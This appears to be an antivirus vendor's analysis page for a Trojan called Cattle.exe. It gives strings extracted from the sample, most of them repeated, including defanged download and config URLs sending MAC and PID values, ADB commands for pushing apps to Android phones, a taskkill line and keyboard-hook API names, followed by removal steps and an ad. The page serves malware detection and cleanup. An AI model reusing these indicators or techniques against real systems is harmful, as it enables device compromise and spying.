KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sPane-%d%x
%sPane-%d
%c%d%c%s
RGB(%d, %d, %d)
%sBasePane-%d%x
%sBasePane-%d
windows
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
KEYS_MENU
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
code %d bits %d->%d
gen_codes: max_code %d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
-.zip
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
1.1.3
%s%s%s
Correct password required
1.2.8
zerr=%d Z_STREAM_END=%d total_out=%lu
entryCount=%d
x-xx-xxxx-xxxx
XXXXXXXXXXX
%d(lo-client:%s%d)
%d(%s)
%s%s/
cannot open '%s': %s
cannot stat '%s': %s
skipping special file '%s'
cannot read '%s': %s
error seeking in file '%s'
could not allocate buffer for '%s'
error reading from file: '%s'
file '%s' is not a valid zip file
AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
failed to copy '%s' to '%s': %s
%spush: %s -> %s
%d file%s pushed. %d file%s skipped.
error: %s
%s/%s
hXXp://app.miaoxia8.com/driver/
DPInst.exe
\DPInst.exe
xm32.zip
xm64.zip
ua32.zip
ua64.zip
:%d: %s
0xX,
can't find '%s' to install
can't install '%s' because it's not a file
shell:am start -n %s
shell:input keyevent 3
/data/local/tmp/%s
/sdcard/tmp/%s
--key
host-serial:%s:%s
%s:%s
ANDROID_ADB_SERVER_PORT
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
Zip EOCD: expected >= %d bytes, found %d
EOCD(%d)   comment(%d) exceeds len (%d)
Archive spanning not supported
protocol fault (status x x x x?!)
host:transport:%s
transport-usb
transport-local
transport-any
host:%s
TscServer.exe
error:%d
Windows
PID:%s
127.0.0.1
taskkill /f /im %s
%s\adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
?MAC=%s&PID=%s
adb.ini
APPURL
/TscServer.exe
ShellRun%s/%s
%s\%s
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
InternalGetTcpTable2
transport
XXXXXX
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
c:\app\Call.pdb
.PAVCFileException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCInternetException@@
.?AVCHttpFile@@
.PAVCOleException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
%Documents and Settings%\%current user%\Application Data\Cattle.exe
10/13/2009
000000000000
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_12187
PeekNamedPipe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
Reporte_Dispatch
RegQueryInfoKeyA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteA
UrlUnescapeA
GetAsyncKeyState
MapVirtualKeyA
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GetKeyNameTextA
MapVirtualKeyExA
GetKeyboardLayout
UnhookWindowsHookEx
GetKeyboardState
InternetOpenUrlA
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCrackUrlA
2;%SK
`T##.#.WA3##-3&<<
.QICN,--6[?-`=#10$  F .  t33?-W7P53R-- 33 #51;. #13 5;-[3-M?-3#6#M->-a051?-#3 ..#
 ###$-1?
- (;%(10
$,0(,$($,000 ,$ $
.text
`.rdata
@.data
.rsrc
@.reloc
G.At#_
.zCN,
^&- (;%(|
`.rdw
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
KERNEL32.DLL
adbWinpi.dll
ADVAPI32.dll
COMCTL32.dll
COMDLG32.dll
GDI32.dll
gdiplus.dll
IMM32.dll
IPHLPAPI.DLL
MSIMG32.dll
OLEACC.dll
OLEAUT32.dll
SETUPAPI.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
WININET.dll
WINMM.dll
WINSPOOL.DRV
WS2_32.dll
@WININET.DLL
accKeyboardShortcut
hhctrl.ocx
dwmapi.dll
UxTheme.dll
USER32.DLL
NRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
manufacturer:%s
product name:%s
version:%s
serial number:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
sku number:%s
family:%s

Cattle.exe_2188_rwx_00401000_001FA000:

t.hP$S
t.hd*S
tWSShW
tl9_ tgSSh
u$SShe
@ SSHPWj
j%XtL9E
tAHt.HHt
t'SShl
<SShG
SSSSh`
FTCP
FtPW
SSh@B
PhL%S
CNotSupportedException
CHttpFile
hXXp://
kernel32.dll
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comdlg32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
RegOpenKeyTransactedA
Advapi32.dll
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
RegDeleteKeyExA
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
commctrl_DragListMsg
CCmdTarget
MFCLink_UrlPrefix
MFCLink_Url
Shell32.dll
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
&%d %s
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ShowCmd
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
CMDITabProxyWnd
CMDIChildWndEx
CMDIFrameWndEx
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sPane-%d%x
%sPane-%d
%c%d%c%s
RGB(%d, %d, %d)
%sBasePane-%d%x
%sBasePane-%d
windows
CMDIChildWnd
CMDIFrameWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
KEYS_MENU
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
operator
GetProcessWindowStation
code %d bits %d->%d
gen_codes: max_code %d
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
-.zip
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
1.1.3
%s%s%s
Correct password required
1.2.8
zerr=%d Z_STREAM_END=%d total_out=%lu
entryCount=%d
x-xx-xxxx-xxxx
XXXXXXXXXXX
%d(lo-client:%s%d)
%d(%s)
%s%s/
cannot open '%s': %s
cannot stat '%s': %s
skipping special file '%s'
cannot read '%s': %s
error seeking in file '%s'
could not allocate buffer for '%s'
error reading from file: '%s'
file '%s' is not a valid zip file
AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
failed to copy '%s' to '%s': %s
%spush: %s -> %s
%d file%s pushed. %d file%s skipped.
error: %s
%s/%s
hXXp://app.miaoxia8.com/driver/
DPInst.exe
\DPInst.exe
xm32.zip
xm64.zip
ua32.zip
ua64.zip
:%d: %s
0xX,
can't find '%s' to install
can't install '%s' because it's not a file
shell:am start -n %s
shell:input keyevent 3
/data/local/tmp/%s
/sdcard/tmp/%s
--key
host-serial:%s:%s
%s:%s
ANDROID_ADB_SERVER_PORT
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
Zip EOCD: expected >= %d bytes, found %d
EOCD(%d)   comment(%d) exceeds len (%d)
Archive spanning not supported
protocol fault (status x x x x?!)
host:transport:%s
transport-usb
transport-local
transport-any
host:%s
TscServer.exe
error:%d
Windows
PID:%s
127.0.0.1
taskkill /f /im %s
%s\adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
?MAC=%s&PID=%s
adb.ini
APPURL
/TscServer.exe
ShellRun%s/%s
%s\%s
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
InternalGetTcpTable2
transport
XXXXXX
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
c:\app\Call.pdb
.PAVCFileException@@
.PAVCException@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.PAVCInternetException@@
.?AVCHttpFile@@
.PAVCOleException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÁ
%Documents and Settings%\%current user%\Application Data\Cattle.exe
10/13/2009
000000000000
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_12187
PeekNamedPipe
GetProcessHeap
GetCPInfo
GetWindowsDirectoryA
Reporte_Dispatch
RegQueryInfoKeyA
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
GetViewportOrgEx
ScaleViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GdiplusShutdown
ShellExecuteA
UrlUnescapeA
GetAsyncKeyState
MapVirtualKeyA
SetWindowsHookExA
GetKeyState
CreateDialogIndirectParamA
GetKeyNameTextA
MapVirtualKeyExA
GetKeyboardLayout
UnhookWindowsHookEx
GetKeyboardState
InternetOpenUrlA
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCrackUrlA
2;%SK
`T##.#.WA3##-3&<<
.QICN,--6[?-`=#10$  F .  t33?-W7P53R-- 33 #51;. #13 5;-[3-M?-3#6#M->-a051?-#3 ..#
 ###$-1?
- (;%(10
$,0(,$($,000 ,$ $
.text
`.rdata
@.data
.rsrc
@.reloc
G.At#_
.zCN,
^&- (;%(|
@WININET.DLL
accKeyboardShortcut
hhctrl.ocx
KERNEL32.DLL
dwmapi.dll
UxTheme.dll
USER32.DLL
NRICHED20.DLL
mscoree.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
manufacturer:%s
product name:%s
version:%s
serial number:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
sku number:%s
family:%s

Cattle.exe_2188_rwx_10018000_0002F000:

%F*>#
kN]%X
: L.xx_
Tf.rh
%CTyN(
.Qzpmz
Uexe
.Ru-]
BuFtp>
.QZ`s


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ndis500.exe:3740
    appmon.exe:2132
    MiniIE.exe:1256
    ndsqp.exe:3824
    audiodg.exe:2216
    yum.exe:3540

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %System%\gYhxYl3.sys (22 bytes)
    %System%\vrPCEc2 (1830 bytes)
    %Documents and Settings%\%current user%\Application Data\adbWinpi.dll (304 bytes)
    %Documents and Settings%\%current user%\Application Data\Cattle.exe (3726 bytes)
    %Documents and Settings%\%current user%\Application Data\AdbWinApi.dll (96 bytes)
    %Documents and Settings%\%current user%\Application Data\AdbWinUsbApi.dll (60 bytes)
    %Documents and Settings%\%current user%\Application Data\TscServer.exe (1653 bytes)
    %System%\jBkaBo6.sys (22 bytes)
    %System%\yuSFHf5 (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\262792\svchost.exe (180 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\26279\svchost.exe (1629 bytes)
    %System%\clk.ini (103 bytes)
    %WinDir%\run.bat (196 bytes)
    %System%\cBLK.dll (2145 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now